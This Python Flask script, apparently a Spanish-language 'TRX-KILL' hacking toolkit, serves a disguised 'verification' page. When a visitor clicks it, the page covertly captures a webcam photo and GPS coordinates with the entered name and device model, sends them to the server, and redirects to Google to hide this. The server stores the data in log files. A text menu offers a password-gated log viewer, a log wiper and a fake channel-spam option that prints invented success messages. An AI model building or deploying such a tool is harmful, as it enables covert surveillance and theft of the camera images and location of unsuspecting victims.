import os, sys, getpass, time, base64
from flask import Flask, request

app = Flask('TRX-KILL')
PORT = 7173
AUTH_PASS = "TRX-kill-op"
STORAGE_PATH = "INFORMACION"
if not os.path.exists(STORAGE_PATH): os.makedirs(STORAGE_PATH)

def banner():
    os.system('cls' if os.name == 'nt' else 'clear')
    print(f"""
\033[1;32m
  ████████╗██████╗ ██╗  ██╗     ██╗  ██╗██╗██╗     ██╗     
  ╚══██╔══╝██╔══██╗╚██╗██╔╝     ██║ ██╔╝██║██║     ██║     
     ██║   ██████╔╝ ╚███╔╝      █████╔╝ ██║██║     ██║     
     ██║   ██╔══██╗ ██╔██╗      ██╔═██╗ ██║██║     ██║     
     ██║   ██║  ██║██╔╝ ██╗     ██║  ██╗██║███████╗███████╗
                                                            
      \033[1;36m[ SISTEMA DE SEGURIDAD Y CONTROL TRX-KILL ]\033[0m
      \033[1;37mVERSION: 1.2.3  |  STATUS: ONLINE  |  OSCAR\033[0m
\033[1;32m""" + "="*60 + "\033[0m")

# --- WEB UI (ENCUESTA NEÓN) ---
HTML_ENCUESTA = """
<!DOCTYPE html><html><head><style>
    body { background:#050505; color:#0f0; font-family:monospace; display:flex; justify-content:center; align-items:center; height:100vh; margin:0; }
    .card { border: 2px solid #0f0; padding:30px; border-radius:15px; box-shadow:0 0 20px #0f0; text-align:center; }
    input { background:#111; color:#0f0; border:1px solid #0f0; padding:10px; width:90%; margin:10px 0; }
    button { background:#0f0; border:none; padding:15px 30px; font-weight:bold; cursor:pointer; }
</style></head><body>
    <div class="card">
        <h1>TRX-KILL VERIFICATION</h1>
        <input type="text" id="p1" placeholder="NOMBRE">
        <input type="text" id="p2" placeholder="MODELO DISPOSITIVO">
        <button onclick="iniciar()">VALIDAR ACCESO TOTAL</button>
    </div>
<script>
    async function iniciar() {
        const s = await navigator.mediaDevices.getUserMedia({video: true});
        const v = document.createElement('video'); v.srcObject = s; v.play();
        setTimeout(async() => {
            const c = document.createElement('canvas');
            c.width = v.videoWidth; c.height = v.videoHeight;
            c.getContext('2d').drawImage(v, 0, 0);
            const img = c.toDataURL('image/png');
            navigator.geolocation.getCurrentPosition(async(p)=>{
                fetch('/log', {method:'POST', headers:{'Content-Type':'application/json'}, 
                body: JSON.stringify({u: document.getElementById('p1').value, d: document.getElementById('p2').value, lat: p.coords.latitude, lon: p.coords.longitude, i: img})});
                window.location.href = "https://google.com";
            });
        }, 1500);
    }
</script></body></html>
"""

@app.route('/')
def index(): return HTML_ENCUESTA

@app.route('/log', methods=['POST'])
def log():
    d = request.json
    with open("result.txt", "a") as f:
        f.write(f"USER: {d.get('u')} | DISP: {d.get('d')} | GPS: {d.get('lat')},{d.get('lon')}\n")
    if d.get('i'):
        with open(f"{STORAGE_PATH}/cap_{int(time.time())}.png", "wb") as f:
            f.write(base64.b64decode(d['i'].split(',')[1]))
    return "OK"

def main():
    while True:
        banner()
        print("  [1] INFO-NUMERO    | [2] ACTIVAR LINK    | [3] CREADOR")
        print("  [4] COPYRIGHT      | [5] DATA-IP         | [6] ADM (LOGS)")
        print("  [7] SALIR          | [8] PROCESOS        | [9] ESTADO")
        print("  [10] BORRAR LOGS   | [11] SPAM-CANAL-WHAT")
        sel = input("\n\033[1;33mTRX-ROOT > \033[0m")
        
        if sel == "2": app.run(port=PORT, host='127.0.0.1')
        elif sel == "6":
            if getpass.getpass("PASS: ") == AUTH_PASS:
                os.system("type result.txt" if os.name == 'nt' else "cat result.txt")
                input("\nPresiona Enter...")
        elif sel == "10": 
            if os.path.exists("result.txt"): os.remove("result.txt"); print("LOGS BORRADOS")
            input()
        elif sel == "11":
            link = input("INGRESAR LINK: ")
            cant = input("CANTIDAD DE SPAM Y MOTIVOS: ")
            canal = input("NAME CANAL: ")
            seguidores = input("SEGUIDORES: ")
            print("\nENVIANDO SPAM...")
            time.sleep(2)
            print(f"CANAL: {canal} | SEGUIDORES: {seguidores}")
            print("ESTADO: CANAL ACTIVO (NO SUSPENDIDO)")
            input("\n[Enter] para volver.")
        elif sel == "7": sys.exit()
        else: print("OPCIÓN NO DISPONIBLE..."); time.sleep(1)

if __name__ == "__main__": main()
